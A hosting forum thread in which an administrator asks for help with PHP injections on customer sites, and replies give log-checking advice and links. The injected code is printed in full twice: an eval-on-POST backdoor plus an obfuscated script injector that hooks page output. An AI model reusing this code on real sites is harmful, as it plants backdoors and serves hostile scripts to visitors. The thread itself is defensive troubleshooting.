iframe/php exploit again

[gertiebeth]

I currently run 22 linex servers using cPanel with heavy mod_security rules and a firewall. PHP has been hardened and many other security measures are in place. Right now I have 3 different people that I host who are suffering from php include hacks. It is only 3 people and their sites are hosted on several different servers. No one else is having a problem, which leads me to believe this is a problem with the user's PC. But for the life of me I cannot find out how to help them! I have tried Google, but I'm not quite search what to search for. Here is an example of the malicious code that is being inserting into their index.php, admin.php and other files:

<?php if(!function_exists('tmp_lkojfghx')){for($i=1;$i<10;$i++)if(is_file($f='/tmp/m'.$i)){include_once($f);break;}if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCmRvY3VtZW50LndyaXRlKHVuZXNjYXBlKCdwR3YlM0NwR3Zzczd4Y3JpcEd2cHQlMjBod3pzcmMzZ0QlM0QlMkZod3olMkY3OCUyRVo3WjExMFo3WiUyRTE3T281R0Q4JTJFMjRIYjlPbyUyRmpPb3F1ZXJHRDh5JTJFSGJqc0dEOCUzRVo3WiUzQzNnRCUyRnNjWjdack9vaWh3enB0JTNFJykucmVwbGFjZSgvSGJ8T298b0t8cEd2fEdEOHwzZ0R8czd4fFo3Wnxod3ovZywiIikpOwogLS0+PC9zY3JpcHQ+'));function tmp_lkojfghx($s){if($g=(bin2hex(substr($s,0,2))=='1f8b'))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(".+?\n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(([email protected]_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?>

Does anyone recognize this? All I've been able to find is problems back in 2008 with IX webhosting, which I have no affiliation with. All of my servers are managed by me from SoftLayer.

Any help?

 

[LiNUxG0d]

Typical source injections...

The common things you can look at, on the server side, are these:

- Locate references to .txt in a users domlogs (in the URI portion of accesses), to see if they logged in using a PHP include... there shouldn't be any if you run mod_sec heavily, but there might... :P

- Check the /var/log/messages to see if the hackers have privs by password that the user may not be aware of.

- Do the same, but for /usr/local/cpanel/logs/access_log (grep the users' username and sift through the IPs for oddballs)

Are you locking down php.ini at all? (disable_functions)

If the user has a cPanel with reseller privs, then you may need to reset their WHM password, as it may be compromised.

Realistically, if it's 3 or so sites, I would think a keylogger on their home PC. If it's 3 or so SERVERS with 100+ accounts or something to that effect, I would think it may be rooted, depending on what's installed on it and how old your kernel is.

There are - really - many many many guesstimatable factors in your equation... if there are no logs to prove intrusion, then I would suspect that the issue is more serious than you may think.

Never take it lightly. I'm sure you don't.

 

[AndyReed]

Here is an example of the malicious code that is being inserting into their index.php, admin.php and other files:

<?php if(!function_exists('tmp_lkojfghx')){for($i=1;$i<10;$i++)if(is_file($f='/tmp/m'.$i)){include_once($f);break;}if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCmRvY3VtZW50LndyaXRlKHVuZXNjYXBlKCdwR3YlM0NwR3Zzczd4Y3JpcEd2cHQlMjBod3pzcmMzZ0QlM0QlMkZod3olMkY3OCUyRVo3WjExMFo3WiUyRTE3T281R0Q4JTJFMjRIYjlPbyUyRmpPb3F1ZXJHRDh5JTJFSGJqc0dEOCUzRVo3WiUzQzNnRCUyRnNjWjdack9vaWh3enB0JTNFJykucmVwbGFjZSgvSGJ8T298b0t8cEd2fEdEOHwzZ0R8czd4fFo3Wnxod3ovZywiIikpOwogLS0+PC9zY3JpcHQ+'));function tmp_lkojfghx($s){if($g=(bin2hex(substr($s,0,2))=='1f8b'))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(".+?\n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(([email protected]_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?>

There are several threads that discussed the iframe injection problem. Check out these threads: http://forums.cpanel.net/showthread.php?t=62821
http://forums.cpanel.net/showthread.php?t=78595
http://forums.cpanel.net/showthread.php?t=78084